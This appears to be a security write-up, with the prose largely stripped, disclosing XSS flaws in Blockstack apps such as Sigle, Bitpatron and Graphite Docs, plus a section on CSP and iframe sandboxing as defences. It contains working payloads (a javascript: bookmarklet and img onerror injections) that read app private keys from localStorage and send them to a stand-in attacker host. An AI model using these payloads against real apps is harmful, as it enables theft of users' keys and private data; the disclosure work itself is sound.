Stealing app private keys on Blockstack

Sigle

Sigle front page
Sigle alert box
javascript:(function(){var a=JSON.parse(localStorage.getItem('blockstack-session'));window.location.href='http://keythief.evildomain.com/?k='+a.userData.appPrivateKey+','+location.origin;})();
Private Sigle post
4f4298165a7dcc67d84b37cff40b104fddb03524d88d4d9d4124ba1e12a17d85,https://app.sigle.io
Sigle private data exposed

Bitpatron

Bitpatron myFiles.json
{"1":{"content":"\"<p>I just stole your app private key</p><img src=\\\"bogus.gif\\\" onerror=\\\"var a=JSON.parse(localStorage.getItem('blockstack'));this.src='http://keythief.evildomain.com/?k='+a.appPrivateKey+','+location.origin;this.onerror=null\\\">\""},"currentFileName":1}
035f81b38451b8edf1646aeceabc506773cc3d38444ecb89cec2a96274111941,https://bitpatron.co
Bitpatron private data

Graphite Docs

Graphite Docs public file on Gaia
{"title":"Steal my keys","content":"<img src=\"bogus.gif\" onerror=\"var a=JSON.parse(localStorage.getItem('blockstack-session'));this.src='http://keythief.evildomain.com/?k='+a.userData.appPrivateKey+','+location.origin;this.onerror=null\">","readOnly":true,"words":3,"shared":"2/16/2020","singleDocIsPublic":true}
Graphite Docs private document
4c508b4e0897bb29c31b6a38815da726c3ff066ba063a1b0f540f1e66849215b,https://app.graphitedocs.com
Graphite Docs private data

Xordrive

Xordrive front page
<?xml version="1.0" encoding="utf-8"?>
<svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
<script type="text/javascript">
document.location.href='https://example.com';
</script>
</svg>
var svg = '<?xml version="1.0" encoding="utf-8"?><svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><script type="text/javascript">console.log(localStorage)</script></svg>';
var blob = new Blob([svg],{type:"image/svg+xml"});
document.getElementsByTagName('iframe')[0].src = URL.createObjectURL(blob);

Other applications

Preventing the attack

<meta http-equiv="Content-Security-Policy" content="script-src 'self'">
Refused to run the JavaScript URL because it violates the following Content Security Policy directive: "script-src 'self'". Either the 'unsafe-inline' keyword, a hash ('sha256-...'), or a nonce ('nonce-...') is required to enable inline execution.
var content = '<html><body><script>alert("evil")</script></body></html>';
var blob = new Blob([content],{type:"text/html"});
var frame = document.createElement('iframe');
frame.sandbox = '';
frame.src = URL.createObjectURL(blob);
document.body.appendChild(frame);
Blocked script execution in 'blob:https://...' because the document's frame is sandboxed and the 'allow-scripts' permission is not set.

Conclusion

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store